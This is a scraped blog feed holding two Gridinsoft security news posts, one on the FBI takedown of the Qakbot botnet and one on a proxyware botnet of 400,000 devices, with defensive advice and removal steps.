The post Qakbot Botnet Hacked, Removed from Over 700,000 Machines appeared first on Gridinsoft Blog.

]]>
Qakbot, a notorious botnet, has been taken down by a multinational law enforcement operation spearheaded by the FBI, Operation “Duck Hunt”. The botnet, also called Qbot and Pinkslipbot, that considered one of the largest and longest-running botnets to date. According to conservative estimates, law enforcement officials have linked Qakbot to at least 40 ransomware attacks. These attacks targeted companies, healthcare providers, and government agencies worldwide, causing damages of hundreds of millions of dollars. Over the past 18 months, the losses due to these attacks have exceeded 58 million dollars.

Qakbot has been known to deploy multiple types of malware, trojans, and highly destructive ransomware variants. They also used their affiliates or operators, which include Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and most recently, Black Basta. It targets the United States and other global infrastructures, including the Election Infrastructure Subsector, Financial Services, Emergency Services, and Commercial Facilities Sectors.

How has the Qakbot botnet been detected?

The FBI found a number of files related to the operation of the Qakbot botnet on a computer used by one of its administrators. These files included chats between the Qakbot administrators and co-conspirators. Also a directory containing several files that held information related to virtual currency wallets, according to court documents, that included a computer used by one of its admins after it had infected over 700,000 computers, with over 200,000 in the United States.

QakBot activity
Map of QakBot activity in the world

While searching through the same computer, a separate file called 'payments.txt' was discovered. It contained a list of individuals who had fallen victim to ransomware. It also included information about the ransomware group, details about their computer systems, dates of the attacks, and the amount of BTC paid to the Qakbot administrators in connection with the attacks.

The agency redirected Qakbot traffic to its servers, giving the FBI the access they needed to remove the malware from compromised devices worldwide. This prevented the deployment of any additional malicious payloads.

Scheme of Qbot injections on the server
Qbot Injection Scheme

Victims were not informed when the uninstaller was executed to remove the malware from their systems. Still, the FBI contacted them using IP addresses and routing information collected from their computers during removal.

Recommendations

Organizations must implement the recommendations provided in the joint CSA by CISA and FBI. This will help to lower the risk of QakBot-related activity and make it easier to detect QakBot-facilitated ransomware and malware infections. If you come across any incidents or anomalous activity, please feel free to contact any of the following organizations without any delay:

  • CISA, either through the agency’s online tool (cisa.gov/report) or the 24/7 Operations Center or (888) 282-0870.
  • FBI via a local field office.

How to prevent botnet attacks?

Using anti-malware software is an important measure to protect your computer from online threats. Cybercriminals can use malware to steal your private information, monitor your online activity, or take over your computer and use it as a botnet. However, dependable anti-malware software can detect and remove malware before it can harm your system. To be proactive in safeguarding your computer, it’s need to regularly update your anti-malware software and carry out full system scans. It’s also crucial to keep your operating system and other software up to date, as software updates often provide security patches that address known vulnerabilities.

The post Qakbot Botnet Hacked, Removed from Over 700,000 Machines appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/qakbot-hacked-removed-from-700k-machines/feed/ 1 16659
Botnet of 400,000 Devices Used as Proxy Nodes Uncovered https://gridinsoft.com/blogs/botnet-of-400000-devices-proxy/ https://gridinsoft.com/blogs/botnet-of-400000-devices-proxy/#respond Tue, 22 Aug 2023 13:47:44 +0000 https://gridinsoft.com/blogs/?p=16612 Cybercriminals used stealthy malware to create a botnet of 400,000 proxy servers. Although the company providing the proxy services claims that users voluntarily provided their devices, experts believe otherwise. A botnet of 400,000 proxy servers Cybersecurity researchers recently discovered a botnet with more than 400,000 existing proxy nodes. At first glance, the attackers appear as… Continue reading Botnet of 400,000 Devices Used as Proxy Nodes Uncovered

The post Botnet of 400,000 Devices Used as Proxy Nodes Uncovered appeared first on Gridinsoft Blog.

]]>
Cybercriminals used stealthy malware to create a botnet of 400,000 proxy servers. Although the company providing the proxy services claims that users voluntarily provided their devices, experts believe otherwise.

A botnet of 400,000 proxy servers

Cybersecurity researchers recently discovered a botnet with more than 400,000 existing proxy nodes. At first glance, the attackers appear as a legitimate company that offers proxy services. However, such concepts as crooks and honesty are incompatible, as the researchers have proven once again. There is a fact that attackers covertly install malware that introduces proxy capabilities on the infected device.

Proxy installation process
Proxy installation process (source: AT&T)

During the installation of the proxy client, the malware sends specific parameters that are also sent to the management and control server. It continuously collects some information about the infected system, such as process monitoring, CPU usage, RAM usage, and battery status. This is done to optimize performance and responsiveness. However, this is not the only case related to the detected payload. Researchers also tie this service to the malware family called AdLoad, that targets macOS. It is a rare occurrence to see cross-platform malware, but thanks to the choice of Golang as a programming language, it is possible for this tricky proxy.

Well Legal, But Actually Illegal

As I wrote above, scammers illegally distribute software that turns the victim’s device into a proxy server. However, things are not so clear-cut here. Although the site states that users provide their devices voluntarily, no notifications or windows are displayed to the user to accept or decline. Nevertheless, the organization that offers resident proxy services is legitimate, and the application has a valid digital signature. Consequently, Windows antivirus tools do not react to it in any way.

Screenshot with VirusTotal results
VirusTotal Analysis Results (1 detection from 71 vendors)

On the other hand, most of the time, macOS detects samples of this software. In addition, the site that provides proxy services rewards users who have provided their device as a proxy server. But since the attackers organize the entire process, they get all the profits. It is not surprising they have not passed such a scheme.

Spreading methods and impact

Spreading methods is yet another slippery place there. As I mentioned above, the software part that makes the infected system act as a proxy node is inside of the client installation file. You give it a go – and your system becomes yet another element of this 400,000 botnet. However, things are not over with these trojanized installers.

The attackers know many people disable their antivirus software when downloading and installing pirated software. So, by this action, people essentially give the attackers a green light to install malware on their computers. Cracked software can be downloaded from various sources, including torrent websites, file-sharing sites, and even legitimate software download sites. The malware is often hidden in the software installer or in the cracks or keygens that are used to activate pirated software. Apart from pirate sites, the primary source of this malware is advertising. Sometimes unscrupulous authors of freeware programs accidentally or intentionally allow their product to be used as a delivery method.

How to Avoid Sketchy Proxies & Malware?

Stay away from using p2p software sharing sites. Torrent trackers are a breeding ground for malware. If you think that repack authors are selfless, you’re mistaken. If you want to avoid consciously paying the application developer for his labor, you will have to pay the repacker unknowingly. However, the price is too high and can range from leaking your data to irretrievably wiping all your information. So, avoid downloading pirated software and running executables from untrustworthy sources.

Protecting your privacy is essential to using only reputable proxy servers with trustworthy offers. Here are some tips for choosing a reputable proxy server:

  • Read reviews from other users. This is a great way to get an idea of the quality of service you can expect from a particular proxy server provider.
  • Please ensure the proxy server provider has a good reputation. You can read online reviews or by looking for accreditations from reputable organizations to check it.
  • Ask about the proxy server provider’s security features. Make sure they offer features like encryption and authentication to protect your data.
  • Only use proxy servers that are paid for. Free proxy servers are often unreliable and can be used to steal your data.

Use anti-malware software as a preventive measure. Crooks can use malware to steal your personal information, track your online activity, or take control of your computer and join it to the botnet. But reliable anti-malware software can detect and remove malware before it can harm your computer. Regularly updating your anti-malware software and performing full system scans can help you stay proactive in detecting and preventing potential security breaches. It’s also essential to keep your operating system and other software up to date, as software updates often include security patches that address known vulnerabilities.

Mitigation

The main signs of proxyware infection include performance, internet speed degradation, and frequent communication with unknown IPs or domains. You should remove the “Digital Pulse” executable found at “%AppData%\” and the Registry key on “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\,” as well as the scheduled task called “DigitalPulseUpdateTask“. That’s it when it comes to removing this threat, but I’d recommend protecting yourself against further cases as well.

The post Botnet of 400,000 Devices Used as Proxy Nodes Uncovered appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/botnet-of-400000-devices-proxy/feed/ 0 16612